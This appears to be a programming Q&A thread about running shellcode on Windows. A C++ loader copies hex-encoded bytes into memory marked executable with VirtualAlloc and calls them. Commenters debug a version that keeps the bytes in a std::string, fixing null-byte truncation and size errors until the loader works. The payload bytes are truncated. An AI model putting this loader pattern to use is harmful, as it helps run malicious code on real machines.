# C++ Convert string to char[] doesn't work with memcpy

Tags: c++, memory, memcpy, shellcode

I use this code below:

```cpp
#include <iostream>
#include <windows.h>
#include <string>

void main(){

    char test[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52...";
    void* exec = VirtualAlloc(0, sizeof test, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
    
    memcpy(exec, test, sizeof test);
    
    ((void(*)())exec)();
}
```

Basically it allows a space in memory, copy the shellcode in this space, and execute it.

This code works very well, but due to some convert and format reasons, my shellcode output needs to be a `string`. Obviously the `string` type is not allowed in `memcpy()`, so are there any way to bypass that restriction?

I precise that I already tried to convert my `string` in a `char[]` with a `for` loop, and also convert this `string` to a `const char*` with `c_str()` function, but the shellcode doesn't execute.

Edit 1 : here is the code that doesn't work:

```
string test =  "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5"....
const char* shellcode = test.c_str();
     
void* exec = VirtualAlloc(0, shellcode.size(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      
memcpy(exec, shellcode, shellcode.size());
       
((void(*)())exec)();
```

Edit 2 :

```
 const char* shellcode =  "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5"....
  string test(shellcode,355);
  const char* shellcode_cstr = test.c_str();
   
  void* exec = VirtualAlloc(0, sizeof shellcode_cstr , MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   memcpy(exec, shellcode_cstr, sizeof shellcode_cstr);
   ((void(*)())exec)();
```

Comment: Please post the code that didn't work instead of describing it. (You do not need a loop or any conversion.)

Comment: I just edited my code but it still strangely doesn't work. What I can't understand is why only char[] works, and not a const char*.

Comment: `string test = "..."` will not work in your example, because the shellcode has embedded `\x00` characters that the `std::string(const char*)` constructor will treat as null terminators, causing the `std::string`'s content to be truncated. You need to use the `std::string(const char*, size_type)` constructor so you can pass in the length of the shellcode, eg: `string test(pointer to shellcode, length of shell code);`

Comment: I see, so are these badchars not treated with a char[]?

Comment: They are not "bad" characters. But no, in the case of `char test[] = "..."`, the compiler simply stores all of the characters between `"..."` as-is, `\x00` characters are not treated as null terminators to truncate the `char[]` data. That is not the same with `string test = "..."`

Comment: If I understand well, I need to initialize a const char* = "my_shellcode", then initialize a string like string test(*shellcode,sizeof shellcode) ?

Comment: Do not dereference the `char*` pointer with `*`, as that will pass a single `char` to `string`, which it doesn't have a constructor for.  But also, `sizeof shellcode` will not work if you use `char*` like that, since you will be taking the size of the `char*` pointer itself rather than the size of the shellcode it is pointing at. That is not the case when you use `char[]` instead, eg: `const char[] shellcode = "my_shellcode"; string test(shellcode, sizeof(shellcode)-1);`

Comment: To follow your instructions, I initialize a const char* with the shellcode, then a string like : string test(shellcode, 355) (where 355 is the length of the shellcode). But unfortunately the shellcode does not want to execute.

Comment: Yes, that will work to create the `string` correctly.  You then need to use `c_str()` when passing the `string` content to `memcpy()`.  What you showed earlier in your EDIT is fine, once you have a `string` with valid content in it.

Comment: I added a second edit to show in a better way what I'm doing. I got no errors, but the shellcode still unable to execute, strangely.

Comment: As I told you a few comments back, using `sizeof` on a `char*` pointer will give you the size of the pointer itself, not the size of the shellcode being pointed at. Once your shellcode is in the `string` correctly, use the string's `size()` instead, eg: `string test(shellcode, 355); void* exec = VirtualAlloc(..., test.size(), ...); memcpy(exec, test.c_str(), test.size());`

Comment: I made a mistake indeed I apologize. It work now with a string, many thanks for your help.